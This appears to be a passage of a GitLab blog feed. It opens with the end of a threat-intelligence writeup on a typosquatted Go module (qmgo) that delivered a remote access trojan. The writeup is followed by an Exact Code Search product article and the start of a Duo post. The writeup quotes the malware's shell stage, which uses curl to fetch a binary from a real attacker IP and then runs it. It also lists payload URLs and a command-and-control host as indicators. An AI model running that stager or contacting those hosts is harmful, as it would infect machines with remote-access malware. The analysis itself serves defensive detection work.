rm -rf /tmp/vod  
curl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  
chmod 777 /tmp/vod  
/tmp/vod  
rm -rf /tmp/vod  
</code></pre>
<p><strong>Layer 4:</strong> The <code>chainelli.mp3</code> file is actually a statically linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at <code>ellipal.spoolsv.cyou</code> on port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:</p>
<ul>
<li>Complete remote shell access and one-off command execution</li>
<li>Screenshot captures</li>
<li>SOCKS proxy functionality to make connections through the compromised machine</li>
<li>Configurable sleep interval between check-ins with the command and control server to avoid detection</li>
<li>Standard remote access trojan features like filesystem browsing and upload/download</li>
</ul>
<h2>They're back (already)</h2>
<p>Just four days after GitLab reported the initial malicious module and saw it removed, <code>github.com/qiiniu/qmgo</code> appeared: a second typosquatted version with identical malicious code. This quick turnaround shows how readily threat actors adapt to takedown efforts, and why detection has to be continuous rather than a one-time exercise.</p>
<h2>GitLab’s approach: Finding needles in haystacks</h2>
<p>The initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. GitLab’s detection system combines multiple techniques to identify malicious dependencies:</p>
<p><strong>Typosquatting detection:</strong> GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.</p>
<p><strong>Semantic heuristics:</strong> Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.</p>
<p><strong>AI-assisted analysis:</strong> A <a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">large language model</a> does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.</p>
<p><strong>Human review:</strong> A human receives an alert to verify the finding and to perform advanced analysis.</p>
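<p>As an illustration of the semantic-heuristics idea, the following sketch walks a Go file's syntax tree and flags calls such as <code>exec.Command</code>. It is a deliberately simplified stand-in, not GitLab's detection system; the flagged-call list and function names are our own:</p>

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// suspiciousCalls statically scans Go source for selector calls that
// commonly appear in malicious payloads (command execution, raw HTTP
// fetches). A production detector would use far richer analysis.
func suspiciousCalls(src string) []string {
	flagged := map[string]bool{
		"exec.Command": true,
		"http.Get":     true,
	}
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, "sample.go", src, 0)
	if err != nil {
		return nil
	}
	var hits []string
	ast.Inspect(f, func(n ast.Node) bool {
		call, ok := n.(*ast.CallExpr)
		if !ok {
			return true
		}
		sel, ok := call.Fun.(*ast.SelectorExpr)
		if !ok {
			return true
		}
		pkg, ok := sel.X.(*ast.Ident)
		if !ok {
			return true
		}
		name := pkg.Name + "." + sel.Sel.Name
		if flagged[name] {
			hits = append(hits, name)
		}
		return true
	})
	return hits
}

func main() {
	src := `package payload
import "os/exec"
func run(cmd string) { exec.Command("/bin/sh", "-c", cmd).Start() }`
	fmt.Println(suspiciousCalls(src)) // [exec.Command]
}
```

Flagging an API call is only the first filter; as the article notes, an LLM pass and a human reviewer then decide whether the behavior is actually malicious in context.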
<h2>Recommendations: Staying ahead of persistent supply chain threats</h2>
<p>This attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.</p>
<p>The quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.</p>
<p>We've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.</p>
<h2>Indicators of compromise</h2>
<table>
<thead>
<tr>
<th style="text-align:left">IOC</th>
<th style="text-align:left">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left"><code>github.com/qiniiu/qmgo</code></td>
<td style="text-align:left">Malicious Go module</td>
</tr>
<tr>
<td style="text-align:left"><code>github.com/qiiniu/qmgo</code></td>
<td style="text-align:left">Malicious Go module</td>
</tr>
<tr>
<td style="text-align:left"><code>https://raw.githubusercontent.com/qiniiu/vue-element-admin/refs/heads/main/public/update.html</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>https://img.googlex.cloud/seed.php</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>http://207.148.110.29:80/logon61.gif</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>http://207.148.110.29:80/chainelli.mp3</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>img.googlex.cloud</code></td>
<td style="text-align:left">Payload delivery host</td>
</tr>
<tr>
<td style="text-align:left"><code>207.148.110.29</code></td>
<td style="text-align:left">Payload delivery host</td>
</tr>
<tr>
<td style="text-align:left"><code>ellipal.spoolsv.cyou</code></td>
<td style="text-align:left">Command &amp; Control host</td>
</tr>
<tr>
<td style="text-align:left"><code>6ada952c592f286692c59028c5e0fc3fa589759f</code></td>
<td style="text-align:left">SHA-1 checksum of chainelli.mp3 remote administration malware</td>
</tr>
<tr>
<td style="text-align:left"><code>8ae533e2d1d89c871908cbcf5c7d89c433d09b2e7f7d4ade3aef46c55b66509c</code></td>
<td style="text-align:left">SHA-256 checksum of chainelli.mp3 remote administration malware</td>
</tr>
<tr>
<td style="text-align:left"><code>/tmp/vod</code></td>
<td style="text-align:left">Temporary download location of chainelli.mp3 remote administration malware</td>
</tr>
</tbody>
</table>
<h2>How GitLab helps secure the software supply chain</h2>
<p>Malicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes <a href="https://docs.gitlab.com/user/application_security/secure_your_application/">Application Security Testing</a> scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production.</p>
<p>Paired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity.</p>
<h2>Timeline</h2>
<ul>
<li><strong>2025-06-01T09:31:</strong> GitLab reports <code>github.com/qiniiu/qmgo</code> to Go Security</li>
<li><strong>2025-06-01T09:43:</strong> GitLab reports <code>github.com/qiniiu/qmgo</code> to GitHub</li>
<li><strong>2025-06-01T10:14:</strong> GitLab reports <code>ellipal.spoolsv.cyou</code> (<code>188.166.213.194</code>) to the IP block owner</li>
<li><strong>2025-06-02T04:03:</strong> Go Security takes down <code>github.com/qiniiu/qmgo</code></li>
<li><strong>2025-06-02T09:57:</strong> The IP block owner suspends <code>188.166.213.194</code></li>
<li><strong>2025-06-03T09:15:</strong> GitHub suspends <code>github.com/qiniiu</code></li>
<li><strong>2025-06-05T17:15:</strong> GitLab reports <code>github.com/qiiniu/qmgo</code> to Go Security</li>
<li><strong>2025-06-05T17:33:</strong> GitLab reports <code>github.com/qiiniu/qmgo</code> to GitHub</li>
<li><strong>2025-06-05T17:45:</strong> Go Security takes down <code>github.com/qiiniu/qmgo</code></li>
<li><strong>2025-06-06T12:25:</strong> GitHub suspends <code>github.com/qiiniu</code></li>
</ul>
]]></content>
        <author>
            <name>Michael Henriksen</name>
            <uri>https://about.gitlab.com/blog/authors/michael-henriksen</uri>
        </author>
        <published>2025-06-30T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Exact Code Search: Find code faster across repositories]]></title>
        <id>https://about.gitlab.com/blog/exact-code-search-find-code-faster-across-repositories/</id>
        <link href="https://about.gitlab.com/blog/exact-code-search-find-code-faster-across-repositories/"/>
        <updated>2025-06-25T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><strong>TL;DR:</strong> What if you could find any line of code across 48 TB of repositories in milliseconds? GitLab's new <a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">Exact Code Search</a> makes this possible, delivering pinpoint precision, powerful regex support, and contextual multi-line results that transform how teams work with large codebases.</p>
<h2>Why traditional code search is challenging</h2>
<p>Anyone who works with code knows the frustration of searching across repositories. Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.</p>
<p>These conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.</p>
<p>GitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After <a href="https://gitlab.com/groups/gitlab-org/-/epics/7404">evaluating numerous options</a>, we developed a better solution.</p>
<h2>Introducing Exact Code Search: Three game-changing capabilities</h2>
<p>Enter GitLab's <strong><a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">Exact Code Search</a></strong>, currently in beta testing and powered by <a href="https://github.com/sourcegraph/zoekt">Zoekt</a> (pronounced &quot;zookt&quot;, Dutch for &quot;search&quot;). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.</p>
<p>This feature revolutionizes how you find and understand code with three key capabilities:</p>
<p><strong>1. Exact Match mode: Zero false positives</strong></p>
<p>When toggled to <strong>Exact Match mode</strong>, the search engine returns only results that match your query exactly as entered, eliminating false positives. This precision is invaluable when:</p>
<ul>
<li>Searching for specific error messages</li>
<li>Looking for particular function signatures</li>
<li>Finding instances of specific variable names</li>
</ul>
<p><strong>2. Regular Expression mode: Powerful pattern matching</strong></p>
<p>For complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:</p>
<ul>
<li>Find functions following specific naming patterns</li>
<li>Locate variables matching certain constraints</li>
<li>Identify potential security vulnerabilities using pattern matching</li>
</ul>
<p><strong>3. Multiple-line matches: See code in context</strong></p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750704179/ttjuilkt3v7gtyywnchx.png" alt="Exact Code Search"></p>
<p>Instead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.</p>
<h2>From features to workflows: Real-world use cases and impact</h2>
<p>Let's see how these capabilities translate to real productivity gains in everyday development scenarios:</p>
<h3>Debugging: From error message to root cause in seconds</h3>
<p>Before Exact Code Search:
Copy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.</p>
<p>With Exact Code Search:</p>
<ol>
<li>Copy the exact error message</li>
<li>Paste it into Exact Code Search with Exact Match mode</li>
<li>Instantly find the precise location where the error is thrown, with surrounding context</li>
</ol>
<p><strong>Impact:</strong> Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.</p>
<h3>Code exploration: Master unfamiliar codebases quickly</h3>
<p>Before Exact Code Search:
Browse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.</p>
<p>With Exact Code Search:</p>
<ul>
<li>Search for key methods or classes with Exact Match mode</li>
<li>Review multiple line matches to understand implementation details</li>
<li>Use Regular Expression mode to find similar patterns across the codebase</li>
</ul>
<p><strong>Impact:</strong> Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.</p>
<h3>Refactoring with confidence</h3>
<p>Before Exact Code Search:
Attempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.</p>
<p>With Exact Code Search:</p>
<ul>
<li>Use Exact Match mode to find all occurrences of methods or variables</li>
<li>Review context to understand usage patterns</li>
<li>Plan your refactoring with complete information about impact</li>
</ul>
<p><strong>Impact:</strong> Eliminate the &quot;missed instance&quot; bugs that often plague refactoring efforts, improving code quality and reducing rework.</p>
<h3>Security auditing: Finding vulnerable patterns</h3>
<p>Security teams can:</p>
<ul>
<li>Create regex patterns matching known vulnerable code</li>
<li>Search across all repositories in a namespace</li>
<li>Quickly identify potential security issues with context that helps assess risk</li>
</ul>
<p><strong>Impact:</strong> Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.</p>
<h3>Cross-repository insights</h3>
<p>Search across your entire namespace or instance to:</p>
<ul>
<li>Identify similar implementations across different projects</li>
<li>Discover opportunities for shared libraries or standardization</li>
</ul>
<p><strong>Impact:</strong> Break down silos between projects and identify opportunities for code reuse and standardization.</p>
<h2>The technical foundation: How Zoekt delivers speed and precision</h2>
<p>Before diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.</p>
<h3>Positional trigrams: The secret to lightning-fast exact matches</h3>
<p>Zoekt's speed comes from its use of <strong>positional trigrams</strong> — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.</p>
<p>Here's how it works:</p>
<p><strong>Traditional full-text search engines</strong> like Elasticsearch tokenize code into words and lose positional information. When you search for <code>getUserId()</code>, they might return results containing <strong>user</strong>, <strong>get</strong>, and <strong>Id</strong> scattered throughout a file — leading to those frustrating false positives for GitLab users.</p>
<p><strong>Zoekt's positional trigrams</strong> maintain exact character sequences and their positions. When you search for <code>getUserId()</code>, Zoekt looks for the exact trigrams <strong>get</strong>, <strong>etU</strong>, <strong>tUs</strong>, <strong>Use</strong>, <strong>ser</strong>, <strong>erI</strong>, <strong>rId</strong>, <strong>Id(</strong>, <strong>d()</strong>, all in the correct sequence and position. This ensures that only exact matches are returned.</p>
<p>The result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/325234">one of our most requested features</a> for good reason: developers were losing significant time sifting through false positives.</p>
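<p>A toy version of trigram extraction makes the idea concrete. This sketch records every three-character sequence together with its position, in the spirit of (but much simpler than) Zoekt's actual index format:</p>

```go
package main

import "fmt"

// trigram pairs a three-character sequence with its byte offset,
// mirroring in simplified form the positional trigrams Zoekt indexes.
type trigram struct {
	Seq string
	Pos int
}

// trigrams returns every overlapping three-character sequence in s
// along with the position where it starts.
func trigrams(s string) []trigram {
	var out []trigram
	for i := 0; i+3 <= len(s); i++ {
		out = append(out, trigram{Seq: s[i : i+3], Pos: i})
	}
	return out
}

func main() {
	for _, t := range trigrams("getUserId()") {
		fmt.Printf("%q@%d ", t.Seq, t.Pos)
	}
	fmt.Println()
}
```

An exact match then requires each successive trigram to occur one position after the previous one, which is what rules out the scattered-token false positives that plague word-based search.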
<h3>Regular expression performance at scale</h3>
<p>Zoekt excels at exact matches and is optimized for regular expression searches. The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.</p>
<h2>Built for enterprise scale</h2>
<p>Exact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.</p>
<h3>Handling terabytes of code with ease</h3>
<p>On GitLab.com alone, our Exact Code Search infrastructure indexes and searches over <strong>48 TB</strong> of code data while maintaining lightning-fast response times. That represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put it in perspective: It is more code than the entire Linux kernel, Android, and Chromium projects combined, yet Exact Code Search can find a specific line across this massive codebase in milliseconds.</p>
<h3>Self-registering node architecture</h3>
<p>Our innovative implementation features:</p>
<ul>
<li><strong>Automatic node registration:</strong> Zoekt nodes register themselves with GitLab</li>
<li><strong>Dynamic shard assignment:</strong> The system automatically assigns namespaces to nodes</li>
<li><strong>Health monitoring:</strong> Nodes that don't check in are automatically marked offline</li>
</ul>
<p>This self-configuring architecture dramatically simplifies scaling. When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.</p>
<h3>Distributed system with intelligent load balancing</h3>
<p>Behind the scenes, Exact Code Search operates as a distributed system with these key components:</p>
<ul>
<li><strong>Specialized search nodes:</strong> Purpose-built servers that handle indexing and searching</li>
<li><strong>Smart sharding:</strong> Code is distributed across nodes based on namespaces</li>
<li><strong>Automatic load balancing:</strong> The system intelligently distributes work based on capacity</li>
<li><strong>High availability:</strong> Multiple replicas ensure continuous operation even if nodes fail</li>
</ul>
<p><em>Note: High availability is built into the architecture but not yet fully enabled. See <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/514736">Issue 514736</a> for updates.</em></p>
<h3>Seamless security integration</h3>
<p>Exact Code Search automatically integrates with GitLab's permission system:</p>
<ul>
<li>Search results are filtered based on the user's access rights</li>
<li>Only code from projects the user has access to is displayed</li>
<li>Security is built into the core architecture, not added as an afterthought</li>
</ul>
<h3>Optimized performance</h3>
<ul>
<li><strong>Efficient indexing:</strong> Large repositories are indexed in tens of seconds</li>
<li><strong>Fast query execution:</strong> Most searches return results with sub-second response times</li>
<li><strong>Streaming results:</strong> The new gRPC-based federated search streams results as they're found</li>
<li><strong>Early termination:</strong> Once enough results are collected, the system stops searching to avoid wasted work</li>
</ul>
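<p>The streaming and early-termination behavior above can be sketched with Go channels and a cancellable context. This is an illustrative model only, not GitLab's gRPC implementation; all names here are hypothetical:</p>

```go
package main

import (
	"context"
	"fmt"
	"sync"
)

// searchShard simulates one search node streaming matches into out
// until its shard is exhausted or the coordinator cancels the search.
func searchShard(ctx context.Context, shard []string, out chan<- string) {
	for _, m := range shard {
		select {
		case out <- m:
		case <-ctx.Done():
			return
		}
	}
}

// collect gathers at most limit results from all shards, then cancels
// the in-flight searches so nodes stop doing wasted work.
func collect(shards [][]string, limit int) []string {
	ctx, cancel := context.WithCancel(context.Background())
	defer cancel()

	out := make(chan string)
	var wg sync.WaitGroup
	for _, s := range shards {
		wg.Add(1)
		go func(shard []string) {
			defer wg.Done()
			searchShard(ctx, shard, out)
		}(s)
	}
	go func() { wg.Wait(); close(out) }()

	var results []string
	for m := range out {
		results = append(results, m)
		if len(results) == limit {
			cancel() // early termination: remaining shard work is abandoned
			break
		}
	}
	return results
}

func main() {
	shards := [][]string{
		{"a.go:12", "a.go:40"},
		{"b.go:3", "b.go:7", "b.go:9"},
	}
	fmt.Println(len(collect(shards, 3))) // 3
}
```

The key design point is that cancellation propagates to every shard, so a query that finds enough matches on the first node never pays for a full scan of the rest.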
<h2>From library to distributed system: Engineering challenges we solved</h2>
<p>While Zoekt provided the core search technology, it was originally designed as a minimal library for managing <code>.zoekt</code> index files, not as a distributed database or enterprise-scale service. Here are the key engineering challenges we overcame to make it work at GitLab's scale:</p>
<h3>Challenge 1: Building an orchestration layer</h3>
<p><strong>The problem:</strong> Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.</p>
<p><strong>Our solution:</strong> We built a comprehensive orchestration layer that:</p>
<ul>
<li>Creates and manages database models to track nodes, indices, repositories, and tasks</li>
<li>Implements a self-registering node architecture (inspired by GitLab Runner)</li>
<li>Handles automatic shard assignment and load balancing across nodes</li>
<li>Provides bidirectional API communication between GitLab Rails and Zoekt nodes</li>
</ul>
<h3>Challenge 2: Scaling storage and indexing</h3>
<p><strong>The problem:</strong> How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?</p>
<p><strong>Our solution:</strong> We implemented:</p>
<ul>
<li>Intelligent sharding: Namespaces are distributed across nodes based on capacity and load</li>
<li>Independent replication: Each node independently indexes from <a href="https://gitlab.com/gitlab-org/gitaly">Gitaly</a> (our Git storage service), eliminating complex synchronization</li>
<li>Watermark management: Sophisticated storage allocation that prevents nodes from running out of space</li>
<li>Unified binary architecture: A single <code>gitlab-zoekt</code> binary that can operate in both indexer and webserver modes</li>
</ul>
<h3>Challenge 3: Permission integration</h3>
<p><strong>The problem:</strong> Zoekt had no concept of GitLab's complex permission system: users should only see results from projects they can access.</p>
<p><strong>Our solution:</strong> We built native permission filtering directly into the search flow:</p>
<ul>
<li>Search requests include user permission context</li>
<li>Results are filtered at query time to include only projects the user can currently access, so stale index data cannot leak if permissions change after indexing</li>
</ul>
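<p>Conceptually, the query-time permission filter reduces to something like the following sketch, where the <code>result</code> type and access map are hypothetical stand-ins for GitLab's real permission model:</p>

```go
package main

import "fmt"

// result is a single code search hit.
type result struct {
	ProjectID int
	Line      string
}

// filterByAccess keeps only hits from projects the user can currently
// access, applied at query time so stale index data cannot leak.
func filterByAccess(hits []result, accessible map[int]bool) []result {
	var visible []result
	for _, h := range hits {
		if accessible[h.ProjectID] {
			visible = append(visible, h)
		}
	}
	return visible
}

func main() {
	hits := []result{
		{ProjectID: 1, Line: "func main() {"},
		{ProjectID: 2, Line: "apiToken := loadToken()"},
	}
	canSee := map[int]bool{1: true} // this user can access project 1 only
	fmt.Println(len(filterByAccess(hits, canSee))) // 1
}
```

Filtering at query time rather than at index time is the design choice that keeps security current even when the index lags behind a permission change.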
<h3>Challenge 4: Operational simplicity</h3>
<p><strong>The problem:</strong> Managing a distributed search system shouldn't require a dedicated team.</p>
<p><strong>Our solution:</strong></p>
<ul>
<li>Auto-scaling: Adding capacity is as simple as deploying more nodes, which automatically register and start handling work</li>
<li>Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed</li>
<li>Zero-configuration sharding: The system automatically determines optimal shard assignments</li>
</ul>
<h2>Gradual rollout: Minimizing risk at scale</h2>
<p>Rolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:</p>
<h3>Phase 1: Controlled testing (gitlab-org group)</h3>
<p>We started by enabling Exact Code Search only for the <code>gitlab-org</code> group - our own internal repositories. This allowed us to:</p>
<ul>
<li>Test the system with real production workloads</li>
<li>Identify and fix performance bottlenecks</li>
<li>Streamline the deployment process</li>
<li>Learn from real users' workflows and feedback</li>
</ul>
<h3>Phase 2: Performance validation and optimization</h3>
<p>Before expanding, we focused on ensuring the system could handle GitLab.com's scale:</p>
<ul>
<li>Implemented comprehensive monitoring and alerting</li>
<li>Validated storage management with real production data growth</li>
</ul>
<h3>Phase 3: Incremental customer expansion</h3>
<p>We gradually expanded to customers interested in testing Exact Code Search:</p>
<ul>
<li>Gathered feedback on performance and user experience</li>
<li>Refined the search UI based on real user workflows</li>
<li>Optimized indexing performance (large repositories like <code>gitlab-org/gitlab</code> now index in ~10 seconds)</li>
<li>Refined the architecture based on operational learnings</li>
<li>Massively increased indexing throughput and improved the state-transition lifecycle</li>
</ul>
<h3>Phase 4: Broad rollout</h3>
<p>Today, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. Users can:</p>
<ul>
<li>Toggle between regex and exact search modes</li>
<li>Experience the benefits without any configuration changes</li>
<li>Fall back to the previous search if needed (though few choose to)</li>
</ul>
<p>Rolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.</p>
<blockquote>
<p><strong>For technical deep dive:</strong> Interested in the detailed architecture and implementation? Check out our comprehensive <a href="https://handbook.gitlab.com/handbook/engineering/architecture/design-documents/code_search_with_zoekt/">design document</a> for in-depth technical details about how we built this distributed search system.</p>
</blockquote>
<h2>Getting started with Exact Code Search</h2>
<p>Getting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).</p>
<h3>Quickstart guide</h3>
<ol>
<li>Navigate to the Advanced Search in your GitLab project or group</li>
<li>Enter your search term in the code tab</li>
<li>Toggle between Exact Match and Regular Expression modes</li>
<li>Use filters to refine your search</li>
</ol>
<h3>Basic search syntax</h3>
<p>Whether using Exact Match or Regular Expression mode, you can refine your search with modifiers:</p>
<table>
<thead>
<tr>
<th>Query Example</th>
<th>What It Does</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>file:js</code></td>
<td>Searches only in files containing &quot;js&quot; in their name</td>
</tr>
<tr>
<td><code>foo -bar</code></td>
<td>Finds &quot;foo&quot; but excludes results with &quot;bar&quot;</td>
</tr>
<tr>
<td><code>lang:ruby</code></td>
<td>Searches only in Ruby files</td>
</tr>
<tr>
<td><code>sym:process</code></td>
<td>Finds &quot;process&quot; in symbols (methods, classes, variables)</td>
</tr>
</tbody>
</table>
<blockquote>
<p><strong>Pro Tip:</strong> For the most efficient searches, start specific and then broaden if needed. Using <code>file:</code> and <code>lang:</code> filters dramatically increases relevance.</p>
</blockquote>
<h3>Advanced search techniques</h3>
<p>Stack multiple filters for precision:</p>
<pre><code>is_expected file:rb -file:spec
</code></pre>
<p>This finds &quot;is_expected&quot; in Ruby files that don't have &quot;spec&quot; in their name.</p>
<p>Use regular expressions for powerful patterns:</p>
<pre><code>token.*=.*[\&quot;']
</code></pre>
<p><a href="https://gitlab.com/search?search=token.*%3D.*%5B%5C%22'%5D&amp;nav_source=navbar&amp;project_id=46649240&amp;group_id=9970&amp;search_code=true&amp;repository_ref=main&amp;regex=true">Watch this search performed against the GitLab Zoekt repository.</a></p>
<p>This search helps surface hardcoded tokens and passwords, which can become a security issue if they go undetected.</p>
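<p>As a rough local sketch of the same idea, a similar pattern can be tried with plain <code>grep</code> against a throwaway file (the file name and contents below are purely illustrative):</p>
<pre><code class="language-shell"># Create a sample file containing a hardcoded token, then scan it.
printf 'api_token = &quot;s3cr3t&quot;\nsafe_value = 1\n' &gt; sample.rb
grep -nE &quot;token.*=.*[\&quot;']&quot; sample.rb
# prints: 1:api_token = &quot;s3cr3t&quot;
</code></pre>
<p>The advantage of Exact Code Search is that the same regular expression runs across every indexed repository at once, not just files on your local disk.</p>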
<p>For more detailed syntax information, check the <a href="https://docs.gitlab.com/user/search/exact_code_search/#syntax">Exact Code Search documentation</a>.</p>
<h2>Availability and deployment</h2>
<h3>Current availability</h3>
<p>Exact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:</p>
<ul>
<li>Available for over 99% of licensed groups</li>
<li>Search in the UI automatically uses Zoekt when available; in the Search API, Exact Code Search is behind a feature flag</li>
</ul>
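<p>For API consumers, blob (code) search goes through the regular Search API once the flag is enabled for your instance. Here is a sketch that builds the request URL; the project ID and token are hypothetical placeholders:</p>
<pre><code class="language-shell"># scope=blobs targets code search; spaces in the query must be URL-encoded.
PROJECT_ID=12345
QUERY='lang:ruby foo'
ENCODED=$(printf '%s' &quot;$QUERY&quot; | sed 's/ /%20/g')
echo &quot;https://gitlab.com/api/v4/projects/${PROJECT_ID}/search?scope=blobs&amp;search=${ENCODED}&quot;
# Then call it with:
# curl --header &quot;PRIVATE-TOKEN: &lt;your-token&gt;&quot; &quot;&lt;url printed above&gt;&quot;
</code></pre>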
<h3>Self-managed deployment options</h3>
<p>For self-managed instances, we offer several deployment methods:</p>
<ul>
<li>Kubernetes/Helm: Our most well-supported method, using our <a href="https://gitlab.com/gitlab-org/cloud-native/charts/gitlab-zoekt"><code>gitlab-zoekt</code> Helm chart</a></li>
<li>Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods</li>
</ul>
<p>System requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.</p>
<h2>What's coming next</h2>
<p>While Exact Code Search is already powerful, we're continuously improving it:</p>
<ul>
<li><strong>Scale optimizations</strong> to support instances with hundreds of thousands of repositories</li>
<li><strong>Improved self-managed deployment</strong> options, including streamlined Omnibus support</li>
<li><strong>Full high availability support</strong> with automatic failover and load balancing</li>
</ul>
<p>Stay tuned for updates as we move from Beta to General Availability.</p>
<h2>Transform how you work with code</h2>
<p>GitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:</p>
<ul>
<li>No more wasting time with irrelevant results</li>
<li>No more missing important matches</li>
<li>No more clicking through files just to understand basic context</li>
<li>No more performance issues as codebases grow</li>
</ul>
<p>The impact extends beyond individual productivity:</p>
<ul>
<li><strong>Teams collaborate better</strong> with easy code referencing</li>
<li><strong>Knowledge sharing accelerates</strong> when patterns are discoverable</li>
<li><strong>Onboarding becomes faster</strong> with quick codebase comprehension</li>
<li><strong>Security improves</strong> with effective pattern auditing</li>
<li><strong>Technical debt reduction</strong> becomes more feasible</li>
</ul>
<p>Exact Code Search isn't just a feature; it's a better way to understand and work with code. Stop searching and start finding.</p>
<p><strong>We'd love to hear from you!</strong> Share your experiences, questions, or feedback about Exact Code Search in our <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/420920">feedback issue</a>. Your input helps us prioritize improvements and new features.</p>
<blockquote>
<h4>Ready to experience smarter code search? Learn more in our <a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">documentation</a> or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? Try <a href="https://about.gitlab.com/free-trial/">a free, 60-day trial of GitLab Ultimate with Duo</a>!</h4>
</blockquote>
]]></content>
        <author>
            <name>Dmitry Gruzd</name>
            <uri>https://about.gitlab.com/blog/authors/dmitry-gruzd</uri>
        </author>
        <published>2025-06-25T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Speed meets governance: Model Selection comes to GitLab Duo]]></title>
        <id>https://about.gitlab.com/blog/speed-meets-governance-model-selection-comes-to-gitlab-duo/</id>
        <link href="https://about.gitlab.com/blog/speed-meets-governance-model-selection-comes-to-gitlab-duo/"/>
        <updated>2025-06-25T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>New AI models are released almost daily, each with unique capabilities, performance characteristics, and compliance implications. At GitLab, we're committed to delivering cutting-edge AI capabilities by <a href="https://about.gitlab.com/blog/2024/05/09/developing-gitlab-duo-how-we-validate-and-test-ai-models-at-scale/">continuously integrating the latest and highest-performing models as they become available</a>. However, we know this fast pace can create complex challenges for enterprise organizations whose model usage is subject to strict governance, compliance, and security standards.</p>
